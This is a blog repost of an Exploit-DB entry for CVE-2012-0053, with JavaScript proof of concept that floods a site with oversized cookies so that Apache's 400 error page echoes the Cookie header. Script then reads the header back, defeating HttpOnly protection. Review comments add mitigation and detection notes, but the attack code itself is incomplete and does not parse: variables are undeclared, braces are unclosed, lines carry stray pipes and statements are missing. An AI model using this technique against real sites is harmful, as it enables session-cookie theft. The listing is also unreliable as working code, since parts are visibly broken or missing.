[+] Post Title :
Apache httpOnly Cookie Disclosure
[+] Date : Rabu, 01 Februari 2012
[+] Author : Dr. Cruzz
[+] Link : http://xcruzz.blogspot.com/2012/02/apache-httponly-cookie-disclosure.html
[+] Type :
Exploit
EDB-ID : 18442 CVE: 2012-0053 OSVDB-ID: N/A
Author : pilate Published: 2012-01-31 Verified:
Exploit Code : Download Vulnerable App: N/A
// Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
// Most browsers limit cookies to 4k characters, so we need multiple
// (sentence truncated in this copy; presumably "multiple cookies")
//
// NOTE(review): this listing lost lines in extraction. Braces are not closed,
// `str` is never assigned in the visible code, and every code line carries a
// stray trailing "|". It does not parse as shown.
//
// setCookies(good): writes ten cookies named xss0..xss9 through
// document.cookie. Two assignments are visible: one that expires the cookie
// and one that sets it to `str` with path=/. The branch on `good` that picks
// between them is presumably among the missing lines -- confirm against the
// original gist.
function setCookies (good) { |
// Construct string for cookie value
// (loop body missing from this copy; presumably where `str` is built)
for (var i=0; i< 819 ; i++) { |
// Ten cookies, reusing the same counter `i`
for ( i = 0 ; i < 10; i++) { |
// Expire cookie xss<i>: empty value, expiry 1 ms in the past
var cookie = "xss" +i+"=; expires = "+new Date(+new Date()-1).toUTCString()+" ; path=/;"; |
// Set cookie xss<i> to the padding string, scoped to the whole site (path=/)
var cookie = "xss" +i+"="+str+";path=/"; |
document.cookie = cookie; |
// parseCookies: readystatechange handler (assigned to xhr.onreadystatechange
// further down) that reads cookie name/value pairs out of a 400 response body.
//
// Security point: the handler depends on the server's 400 error page repeating
// the request's Cookie header inside a <pre> element. HttpOnly only keeps a
// cookie out of document.cookie; once the server echoes the header into a
// response that same-origin script can read, the flag no longer protects the
// value. Server-side mitigation: run an httpd build that carries the fix for
// CVE-2012-0053, or configure a custom ErrorDocument for 400 that does not
// reflect request headers.
function parseCookies () { |
// Only react on 400 status, once the request has completed (readyState 4)
if (xhr.readyState === 4 && xhr.status === 400) { |
// Replace newlines and match <pre> content
// NOTE(review): the spaces inside `< pre >` look like an extraction artifact;
// as written the pattern will not match a literal <pre> tag, and a failed
// match() returns null, which the next line would dereference.
var content = xhr.responseText.replace(/\r|\n/g,'').match(/< pre >(.+)<\/pre>/); |
// Drop the first "Cookie: " header name, leaving the name=value pairs
content = content[1].replace("Cookie: ", ""); |
// Strip the padding cookies (xss<digit>= followed by a run of "x"), then
// split what remains on ";"
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g); |
for (var i=0; i<cookies.length; i++) { |
// split('=', 2) keeps only the first two pieces, so a value that itself
// contains "=" is cut at that point
var s_c = cookies[i].split('=',2); |
// NOTE(review): cookie_dict is not declared anywhere in the visible listing
cookie_dict[s_c[0]] = s_c[1]; |
// Unset malicious cookies
// (the statement this comment introduced is missing from this copy)
// Display the collected name/value map as JSON
alert(JSON.stringify(cookie_dict)); |
// NOTE(review): makeRequest is called on the last line but its declaration is
// not in this copy; the three xhr lines below are presumably its body, and
// whatever followed xhr.open is missing as well.
//
// Sets up an asynchronous GET for "/" on the current origin, with parseCookies
// as the state-change handler.
//
// Defender's view: on the server this appears as a GET / answered with status
// 400; where request cookies are captured, they include the names xss0..xss9.
var xhr = new XMLHttpRequest(); |
xhr.onreadystatechange = parseCookies; |
xhr.open("GET", "/", true); |
makeRequest();